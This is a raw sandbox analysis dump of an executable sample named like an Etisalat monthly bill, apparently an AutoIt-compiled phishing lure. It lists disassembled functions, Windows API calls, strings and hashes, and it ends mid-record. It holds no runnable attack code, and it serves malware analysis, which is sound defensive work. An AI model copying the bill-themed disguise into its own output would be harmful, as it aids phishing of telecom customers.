                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 4105515805-45149045
                                      • Opcode ID: d38230f00e11ce47be9bd68a9778c7943fee76170d1e3491e997a6adcbea1758
                                      • Instruction ID: 18091592eb92f6a03d8d6af35caf1aa8e9cf11ed8e430fc6b83f163a8c9c0150
                                      • Opcode Fuzzy Hash: d38230f00e11ce47be9bd68a9778c7943fee76170d1e3491e997a6adcbea1758
                                      • Instruction Fuzzy Hash: ACD172302043469BCB14FF11C495AAEB7E6EF95744F1484E8F8865B3A2CB35EE4ACB41
                                      Function 00BEA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 00BEA89F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00BEA8D0
                                      • GetSysColor.USER32(0000000F), ref: 00BEA8DC
                                      • SetBkColor.GDI32(?,000000FF), ref: 00BEA8F6
                                      • SelectObject.GDI32(?,?), ref: 00BEA905
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00BEA930
                                      • GetSysColor.USER32(00000010), ref: 00BEA938
                                      • CreateSolidBrush.GDI32(00000000), ref: 00BEA93F
                                      • FrameRect.USER32(?,?,00000000), ref: 00BEA94E
                                      • DeleteObject.GDI32(00000000), ref: 00BEA955
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00BEA9A0
                                      • FillRect.USER32(?,?,?), ref: 00BEA9D2
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BEA9FD
                                        • Part of subcall function 00BEAB60: GetSysColor.USER32(00000012), ref: 00BEAB99
                                        • Part of subcall function 00BEAB60: SetTextColor.GDI32(?,?), ref: 00BEAB9D
                                        • Part of subcall function 00BEAB60: GetSysColorBrush.USER32(0000000F), ref: 00BEABB3
                                        • Part of subcall function 00BEAB60: GetSysColor.USER32(0000000F), ref: 00BEABBE
                                        • Part of subcall function 00BEAB60: GetSysColor.USER32(00000011), ref: 00BEABDB
                                        • Part of subcall function 00BEAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BEABE9
                                        • Part of subcall function 00BEAB60: SelectObject.GDI32(?,00000000), ref: 00BEABFA
                                        • Part of subcall function 00BEAB60: SetBkColor.GDI32(?,00000000), ref: 00BEAC03
                                        • Part of subcall function 00BEAB60: SelectObject.GDI32(?,?), ref: 00BEAC10
                                        • Part of subcall function 00BEAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00BEAC2F
                                        • Part of subcall function 00BEAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BEAC46
                                        • Part of subcall function 00BEAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00BEAC5B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: 670d31382f08ede129965282de5c5d3f308cab93ce108fa54e73ab58b44927a4
                                      • Instruction ID: 615ab5df1a914e2a0cf8690e5cf2c78d3dd7aca7b06984ea51ed415c43162261
                                      • Opcode Fuzzy Hash: 670d31382f08ede129965282de5c5d3f308cab93ce108fa54e73ab58b44927a4
                                      • Instruction Fuzzy Hash: 31A19271408386EFD7109F65DC48A6B7BE9FF88321F104A29F9629B1E1DB34E944CB52
                                      Function 00B62C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?), ref: 00B62CA2
                                      • DeleteObject.GDI32(00000000), ref: 00B62CE8
                                      • DeleteObject.GDI32(00000000), ref: 00B62CF3
                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00B62CFE
                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00B62D09
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B9C68B
                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B9C6C4
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B9CAED
                                        • Part of subcall function 00B61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B62036,?,00000000,?,?,?,?,00B616CB,00000000,?), ref: 00B61B9A
                                      • SendMessageW.USER32(?,00001053), ref: 00B9CB2A
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B9CB41
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B9CB57
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B9CB62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                      • String ID: 0
                                      • API String ID: 464785882-4108050209
                                      • Opcode ID: 59b2460ba32a891d6261bc8098b749b63abe1833ea96120f8c014b4e7b63fe9d
                                      • Instruction ID: c3e9c4cd82f0948278a4c90c842c49cd9658ccbbce9bb16b0ccfd26d1bdc4c53
                                      • Opcode Fuzzy Hash: 59b2460ba32a891d6261bc8098b749b63abe1833ea96120f8c014b4e7b63fe9d
                                      • Instruction Fuzzy Hash: AE128D30604642EFEB25CF24C888BA9BBE5FF45310F5445B9E999DB262CB35EC41CB91
                                      Function 00BD77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00BD77F1
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BD78B0
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BD78EE
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BD7900
                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BD7946
                                      • GetClientRect.USER32(00000000,?), ref: 00BD7952
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BD7996
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BD79A5
                                      • GetStockObject.GDI32(00000011), ref: 00BD79B5
                                      • SelectObject.GDI32(00000000,00000000), ref: 00BD79B9
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BD79C9
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD79D2
                                      • DeleteDC.GDI32(00000000), ref: 00BD79DB
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BD7A07
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BD7A1E
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BD7A59
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BD7A6D
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BD7A7E
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BD7AAE
                                      • GetStockObject.GDI32(00000011), ref: 00BD7AB9
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BD7AC4
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BD7ACE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 28a8865fbdd62e8c3041dfa9440be2076ecc8cba1c89c9e9ca549f2c7a7f6262
                                      • Instruction ID: 6f6a938ebcbba2cb1cc7218d401f473bded4c3fbcd1069ce778e0e3c2f24194e
                                      • Opcode Fuzzy Hash: 28a8865fbdd62e8c3041dfa9440be2076ecc8cba1c89c9e9ca549f2c7a7f6262
                                      • Instruction Fuzzy Hash: F5A16271A40215BFEB14DBA4DC4AFAEBBB9EB44710F104155FA15AB2E0DB74AD01CB60
                                      Function 00BCAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCAF89
                                      • GetDriveTypeW.KERNEL32(?,00BEFAC0,?,\\.\,00BEF910), ref: 00BCB066
                                      • SetErrorMode.KERNEL32(00000000,00BEFAC0,?,\\.\,00BEF910), ref: 00BCB1C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 8a11b9c4d0cbb8dc831ffff24d177e259de841d75e08c13a8b3f00186db46f34
                                      • Instruction ID: 58d3a5deb759e3bb4a62a359d5250906574327b61ebdcc85a9e2ae4d6518a468
                                      • Opcode Fuzzy Hash: 8a11b9c4d0cbb8dc831ffff24d177e259de841d75e08c13a8b3f00186db46f34
                                      • Instruction Fuzzy Hash: A9518530A95245AB8B14DB10C9A3FBD73F1EB15742F2840EDE41AB72D1C7759E819B82
                                      Function 00B66A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-86951937
                                      • Opcode ID: cd277d26e0fb8b9c2f29d620bb90e875ea8fc817e13a6cef662efb5d2e5b4298
                                      • Instruction ID: 4bbbdf3aaa9f8ccf7bb0c503c0ebdaf2be2a836525a64838f52e30e304282e70
                                      • Opcode Fuzzy Hash: cd277d26e0fb8b9c2f29d620bb90e875ea8fc817e13a6cef662efb5d2e5b4298
                                      • Instruction Fuzzy Hash: D0810570641245FBCB24BBA0CC93FBE77D8EF11B00F0440F5F941AA1A2EB68EA55C661
                                      Function 00BEAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00BEAB99
                                      • SetTextColor.GDI32(?,?), ref: 00BEAB9D
                                      • GetSysColorBrush.USER32(0000000F), ref: 00BEABB3
                                      • GetSysColor.USER32(0000000F), ref: 00BEABBE
                                      • CreateSolidBrush.GDI32(?), ref: 00BEABC3
                                      • GetSysColor.USER32(00000011), ref: 00BEABDB
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BEABE9
                                      • SelectObject.GDI32(?,00000000), ref: 00BEABFA
                                      • SetBkColor.GDI32(?,00000000), ref: 00BEAC03
                                      • SelectObject.GDI32(?,?), ref: 00BEAC10
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00BEAC2F
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BEAC46
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00BEAC5B
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BEACA7
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BEACCE
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00BEACEC
                                      • DrawFocusRect.USER32(?,?), ref: 00BEACF7
                                      • GetSysColor.USER32(00000011), ref: 00BEAD05
                                      • SetTextColor.GDI32(?,00000000), ref: 00BEAD0D
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BEAD21
                                      • SelectObject.GDI32(?,00BEA869), ref: 00BEAD38
                                      • DeleteObject.GDI32(?), ref: 00BEAD43
                                      • SelectObject.GDI32(?,?), ref: 00BEAD49
                                      • DeleteObject.GDI32(?), ref: 00BEAD4E
                                      • SetTextColor.GDI32(?,?), ref: 00BEAD54
                                      • SetBkColor.GDI32(?,?), ref: 00BEAD5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 2d59db629dc23eb90b4886b9aebc4f5a5cb98c702af4e086dbf88c3908844570
                                      • Instruction ID: 831b0484fc510d25563e54633e9bbcfb43370f80fce646c379979629dff5672a
                                      • Opcode Fuzzy Hash: 2d59db629dc23eb90b4886b9aebc4f5a5cb98c702af4e086dbf88c3908844570
                                      • Instruction Fuzzy Hash: 45617F71900259EFDF119FA5DC88EAE7BB9EF08320F208165F911AB2A1DB719D40DB90
                                      Function 00BE8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BE8D34
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BE8D45
                                      • CharNextW.USER32(0000014E), ref: 00BE8D74
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BE8DB5
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BE8DCB
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BE8DDC
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BE8DF9
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00BE8E45
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BE8E5B
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BE8E8C
                                      • _memset.LIBCMT ref: 00BE8EB1
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BE8EFA
                                      • _memset.LIBCMT ref: 00BE8F59
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BE8F83
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BE8FDB
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00BE9088
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00BE90AA
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BE90F4
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BE9121
                                      • DrawMenuBar.USER32(?), ref: 00BE9130
                                      • SetWindowTextW.USER32(?,0000014E), ref: 00BE9158
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: 22e2d7bbf66c10453b1fb20a210decc3f8f32d1cecd00ef79ec351ba78405a39
                                      • Instruction ID: ddc5f6d98a31a189641dcc0427ee4ec935a5103e47baed80fa5b63de5b963fc9
                                      • Opcode Fuzzy Hash: 22e2d7bbf66c10453b1fb20a210decc3f8f32d1cecd00ef79ec351ba78405a39
                                      • Instruction Fuzzy Hash: 1AE17470900299AFDF209F65CC84EEE7BF9EF05710F108199F919AB290DB709A85DF61
                                      Function 00BE4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00BE4C51
                                      • GetDesktopWindow.USER32 ref: 00BE4C66
                                      • GetWindowRect.USER32(00000000), ref: 00BE4C6D
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BE4CCF
                                      • DestroyWindow.USER32(?), ref: 00BE4CFB
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BE4D24
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BE4D42
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BE4D68
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00BE4D7D
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BE4D90
                                      • IsWindowVisible.USER32(?), ref: 00BE4DB0
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BE4DCB
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BE4DDF
                                      • GetWindowRect.USER32(?,?), ref: 00BE4DF7
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00BE4E1D
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00BE4E37
                                      • CopyRect.USER32(?,?), ref: 00BE4E4E
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00BE4EB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: a7cd755066dffbd6a811623c0b09c38650faba989475f8f1217138ec93a8673c
                                      • Instruction ID: 80ab8e78d2af36e4a5e59592c031f16aa0d58eb95ae392b55c10a302af0be521
                                      • Opcode Fuzzy Hash: a7cd755066dffbd6a811623c0b09c38650faba989475f8f1217138ec93a8673c
                                      • Instruction Fuzzy Hash: 3AB18F71604381AFDB04DF65C889B6ABBE4FF88314F00896CF5999B2A1DB75EC05CB91
                                      Function 00BC46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BC46E8
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BC470E
                                      • _wcscpy.LIBCMT ref: 00BC473C
                                      • _wcscmp.LIBCMT ref: 00BC4747
                                      • _wcscat.LIBCMT ref: 00BC475D
                                      • _wcsstr.LIBCMT ref: 00BC4768
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BC4784
                                      • _wcscat.LIBCMT ref: 00BC47CD
                                      • _wcscat.LIBCMT ref: 00BC47D4
                                      • _wcsncpy.LIBCMT ref: 00BC47FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 699586101-1459072770
                                      • Opcode ID: b0b59e73cfce2d466fd3ddba6b2e089d95c2ea088ba1ce499b4c9abca7a76c45
                                      • Instruction ID: fcc13b7f28e170383648086aacc1eec89902388dfb3087b27ae161377b8e5300
                                      • Opcode Fuzzy Hash: b0b59e73cfce2d466fd3ddba6b2e089d95c2ea088ba1ce499b4c9abca7a76c45
                                      • Instruction Fuzzy Hash: E641E371A002117ADB10BB648C42FBF77FCDF42710F0041EAF904A61A2EF759A01D7A5
                                      Function 00B627D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B628BC
                                      • GetSystemMetrics.USER32(00000007), ref: 00B628C4
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B628EF
                                      • GetSystemMetrics.USER32(00000008), ref: 00B628F7
                                      • GetSystemMetrics.USER32(00000004), ref: 00B6291C
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B62939
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B62949
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B6297C
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B62990
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00B629AE
                                      • GetStockObject.GDI32(00000011), ref: 00B629CA
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B629D5
                                        • Part of subcall function 00B62344: GetCursorPos.USER32(?), ref: 00B62357
                                        • Part of subcall function 00B62344: ScreenToClient.USER32(00C267B0,?), ref: 00B62374
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000001), ref: 00B62399
                                        • Part of subcall function 00B62344: GetAsyncKeyState.USER32(00000002), ref: 00B623A7
                                      • SetTimer.USER32(00000000,00000000,00000028,00B61256), ref: 00B629FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
